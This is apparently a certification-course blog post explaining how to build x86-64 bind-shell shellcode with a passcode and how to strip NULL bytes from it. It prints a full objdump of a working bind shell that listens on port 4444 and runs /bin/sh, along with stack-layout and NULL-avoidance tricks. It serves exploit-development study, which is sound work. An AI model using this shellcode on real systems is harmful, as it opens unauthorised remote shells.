The first assignment of the SLAE64 exam states:
- Create a Shell_Bind_TCP shellcode:
- Binds to a port
- Needs a "passcode"
- If passcode is correct then execute a shell
0x00from the Bind TCP shellcode discussed in the course
Shell Bind TCP shellcode
The first assignment is to create a shell bind TCP shellcode which requires a passcode to spawn a shell. What happens when a wrong password is entered isn't defined so I'll just exit with a non-zero return code.
It follows this basic pattern to spawn a shell:
- Allocate a file descriptor through
- Set up the structure defining the address family, address and port to listen to
- Bind the socket with the above parameters
- Listen on the socket for incoming connections
- Upon accepting a connection perform the needed steps with to duplicate file descriptors for input/output
- Print a password prompt and require the correct password to be entered
- If the password was correct a shell is spawn; otherwise it exits
If this was regular assembly and not shellcode where size is a constraint it would be a good habit to check the return code of the syscalls. Most of them return a negative value upon failure, so we can test for a value less than
0 (set in R13 in the example below) and jump to the
out label which will call
exit with a non-zero return code to indicate a failure. For example:
[...] syscall xor r13, r13 cmp rax, r13 jl out out: mov rax, 60 mov rdi, 1 syscall
However this adds a fair amount of code (8 bytes) for every syscall. So for the sake of this exercise ignore any errors and hope the system doesn't throw us any errors.
The passcode handling relies on a simple
cmp instruction and whether it sets the
zero flag or not. This works as
cmp subtracts the operands and if they were equal the end result is zero, thus
ZF ends up getting set. This means the data we read is equal to the string we stored previously in RBX.
For me the difficulty in this assignment was to correctly lay out the required structs on the stack without introducing any NULL bytes. The prime example of this is setting up
struct sockaddr for the
First off, we need to construct the struct (pun intended) in reverse order as we're dealing with the stack. So start by pushing 8 bytes of 0 for
xor rax, rax push rax
Now here comes the key, push another 8 bytes of zero. This ensures the stack space we need is essentially zeroed out for future additions to the stack to rely upon:
push rax ; Another 8 bytes worth of zero. ; Half of it is for sin_addr.s_addr. mov word [rsp+2], 0x5c11 ; Push our port number (4444) onto the stack mov byte [rsp], 0x2 ; AF_INET = 2
In the end I decided to add an
enter password: prompt as well. Since that strings exceeds 8 bytes it had to be pushed onto the stack using two
The total size of this shellcode is 251 bytes.
Removing 0x00 from the discussed shellcode
The original shellcode contains a fair number of NULLs according to objdump:
$ objdump -D -M intel BindShell.o BindShell.o: file format elf64-x86-64 Disassembly of section .text: 0000000000000000 <_start>: 0: b8 29 00 00 00 mov eax,0x29 5: bf 02 00 00 00 mov edi,0x2 a: be 01 00 00 00 mov esi,0x1 f: ba 00 00 00 00 mov edx,0x0 14: 0f 05 syscall 16: 48 89 c7 mov rdi,rax 19: 48 31 c0 xor rax,rax 1c: 50 push rax 1d: 89 44 24 fc mov DWORD PTR [rsp-0x4],eax 21: 66 c7 44 24 fa 11 5c mov WORD PTR [rsp-0x6],0x5c11 28: 66 c7 44 24 f8 02 00 mov WORD PTR [rsp-0x8],0x2 2f: 48 83 ec 08 sub rsp,0x8 33: b8 31 00 00 00 mov eax,0x31 38: 48 89 e6 mov rsi,rsp 3b: ba 10 00 00 00 mov edx,0x10 40: 0f 05 syscall 42: b8 32 00 00 00 mov eax,0x32 47: be 02 00 00 00 mov esi,0x2 4c: 0f 05 syscall 4e: b8 2b 00 00 00 mov eax,0x2b 53: 48 83 ec 10 sub rsp,0x10 57: 48 89 e6 mov rsi,rsp 5a: c6 44 24 ff 10 mov BYTE PTR [rsp-0x1],0x10 5f: 48 83 ec 01 sub rsp,0x1 63: 48 89 e2 mov rdx,rsp 66: 0f 05 syscall 68: 49 89 c1 mov r9,rax 6b: b8 03 00 00 00 mov eax,0x3 70: 0f 05 syscall 72: 4c 89 cf mov rdi,r9 75: b8 21 00 00 00 mov eax,0x21 7a: be 00 00 00 00 mov esi,0x0 7f: 0f 05 syscall 81: b8 21 00 00 00 mov eax,0x21 86: be 01 00 00 00 mov esi,0x1 8b: 0f 05 syscall 8d: b8 21 00 00 00 mov eax,0x21 92: be 02 00 00 00 mov esi,0x2 97: 0f 05 syscall 99: 48 31 c0 xor rax,rax 9c: 50 push rax 9d: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f a4: 2f 73 68 a7: 53 push rbx a8: 48 89 e7 mov rdi,rsp ab: 50 push rax ac: 48 89 e2 mov rdx,rsp af: 57 push rdi b0: 48 89 e6 mov rsi,rsp b3: 48 83 c0 3b add rax,0x3b b7: 0f 05 syscall
There are a few common patterns we can use to get rid of the NULLs. For example:
mov eax, 41
can also be expressed as:
xor rax, rax ; clear the rax register (effectively zeroing it) add rax, 41 ; add 41 to 0
Instead of using the
add instruction after clearing the register we could increment the register value if we need something small like 1 or 2.
Another methods is to subtract the register from itself:
sub rax, rax add rax, 41
If we also optimize it for size we could take it one step further by using
al which are the lower 8 bits of the 64 bit
04 29 add al,0x29
48 83 c0 29 add rax,0x29
Additionally, using the stack to push values to before popping them into the destination register is another method to get rid of NULLs and oftentimes decrease codesize too.
The end result for my clean
It is slightly larger than the original but I have used a variety of ways to zero out and increment registers without always having used a method that would generate the smallest amount of code per se.
I have uploaded my code to jasperla/slae64 on GitHub:
I have also uploaded a helper script I wrote to the repository which helped me in testing and validating the code throughout the course: compile.py (requires Python 3.6).
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.
Student ID: SLAE64-1614